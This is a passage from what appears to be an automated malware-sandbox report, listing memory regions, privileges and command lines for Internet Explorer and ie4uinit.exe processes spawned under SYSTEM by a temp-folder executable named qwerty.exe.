private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #12: iexplore.exe
0 0
»
Information Value
ID #12
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:42
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x79c
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 64C
0x 20C
0x 4A4
0x 41C
0x 5C4
0x 7FC
0x 81C
0x 82C
0x 83C
0x 860
0x 86C
0x 88C
0x 920
0x 48C
0x 4A8
0x 8E8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
iexplore.exe.mui 0x00060000 0x00061fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x000d0000 0x000d0fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe 0x001a0000 0x00245fff Memory Mapped File Readable, Writable, Executable False False False -
index.dat 0x00250000 0x0025bfff Memory Mapped File Readable, Writable True False False -
index.dat 0x00260000 0x00267fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00270000 0x0027ffff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable True False False -
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000390000 0x00390000 0x00390fff Pagefile Backed Memory Readable True False False -
private_0x00000000003a0000 0x003a0000 0x003a0fff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003b0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x004effff Private Memory Readable, Writable True False False -
locale.nls 0x004f0000 0x00556fff Memory Mapped File Readable False False False -
pagefile_0x0000000000560000 0x00560000 0x006e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x006f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000700000 0x00700000 0x00701fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000710000 0x00710000 0x00710fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000720000 0x00720000 0x00720fff Pagefile Backed Memory Readable True False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01cf0000 0x01fbefff Memory Mapped File Readable False False False -
private_0x0000000001fc0000 0x01fc0000 0x020bffff Private Memory Readable, Writable True False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
private_0x0000000002180000 0x02180000 0x021bffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0220ffff Private Memory Readable, Writable True False False -
private_0x0000000002210000 0x02210000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002260000 0x02260000 0x0229ffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x0230ffff Private Memory Readable, Writable True False False -
private_0x0000000002310000 0x02310000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x024affff Private Memory Readable, Writable True False False -
private_0x00000000024e0000 0x024e0000 0x025dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000025e0000 0x025e0000 0x026befff Pagefile Backed Memory Readable True False False -
private_0x0000000002610000 0x02610000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x00000000026e0000 0x026e0000 0x027dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000027e0000 0x027e0000 0x0284dfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002850000 0x02850000 0x028acfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000028f0000 0x028f0000 0x0292ffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x0293ffff Private Memory Readable, Writable True False False -
private_0x0000000002940000 0x02940000 0x02a3ffff Private Memory Readable, Writable True False False -
private_0x0000000002a40000 0x02a40000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002a90000 0x02a90000 0x02b8ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002bd0000 0x02bd0000 0x02c0ffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02dcffff Private Memory Readable, Writable True False False -
private_0x0000000002e30000 0x02e30000 0x02f2ffff Private Memory Readable, Writable True False False -
private_0x0000000002f70000 0x02f70000 0x0306ffff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x030affff Private Memory Readable, Writable True False False -
private_0x00000000030c0000 0x030c0000 0x031bffff Private Memory Readable, Writable True False False -
private_0x0000000003200000 0x03200000 0x032fffff Private Memory Readable, Writable True False False -
private_0x0000000003300000 0x03300000 0x0330ffff Private Memory Readable, Writable True False False -
private_0x0000000003380000 0x03380000 0x0347ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003480000 0x03480000 0x03872fff Pagefile Backed Memory Readable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x72e00000 0x7387ffff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73c10000 0x73c4bfff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73e90000 0x73ec2fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74290000 0x74298fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x74420000 0x74427fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74430000 0x7443dfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74440000 0x74499fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x744a0000 0x744b2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x74700000 0x74705fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74710000 0x7471cfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74720000 0x74771fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74a40000 0x74a54fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75210000 0x7528afff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 150 entries are omitted.
The remaining entries can be found in flog.txt.
Process #13: ie4uinit.exe
0 0
»
Information Value
ID #13
File Name c:\windows\syswow64\ie4uinit.exe
Command Line "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:42
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x244
Parent PID 0x79c (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 710
0x 32C
0x 144
0x 730
0x 80C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x00230000 0x0024ffff Memory Mapped File Readable True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002fffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x0037ffff Private Memory Readable, Writable True False False -
private_0x0000000000410000 0x00410000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x0062efff Pagefile Backed Memory Readable True False False -
private_0x0000000000650000 0x00650000 0x0068ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00847fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000850000 0x00850000 0x009d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009e0000 0x009e0000 0x00d22fff Pagefile Backed Memory Readable True False False -
private_0x0000000000d30000 0x00d30000 0x00e2ffff Private Memory Readable, Writable True False False -
private_0x0000000000eb0000 0x00eb0000 0x00eeffff Private Memory Readable, Writable True False False -
ie4uinit.exe 0x00f30000 0x00f5dfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000f60000 0x00f60000 0x0235ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002360000 0x02360000 0x02752fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02760000 0x02a2efff Memory Mapped File Readable False False False -
private_0x0000000002a40000 0x02a40000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afffff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02b6ffff Private Memory Readable, Writable True False False -
oleacc.dll 0x73c10000 0x73c4bfff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x73ea0000 0x73ea8fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x73eb0000 0x73eb9fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x73ec0000 0x73ecafff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x73ed0000 0x73ee8fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x73ef0000 0x73f5ffff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x73f60000 0x73f68fff Memory Mapped File Readable, Writable, Executable False False False -
advpack.dll 0x73f70000 0x73f9dfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74290000 0x74298fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x742f0000 0x743e4fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x74c90000 0x74ca1fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75290000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75860000 0x75886fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #14: iexplore.exe
0 0
»
Information Value
ID #14
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1948 CREDAT:14337
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:41
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x49c
Parent PID 0x79c (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x A00
0x 70C
0x 5F8
0x 6D0
0x A14
0x 8F4
0x A1C
0x 8F0
0x 8E4
0x A24
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x0002ffff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe.mui 0x000e0000 0x000e1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00110000 0x00110fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe 0x001a0000 0x00245fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
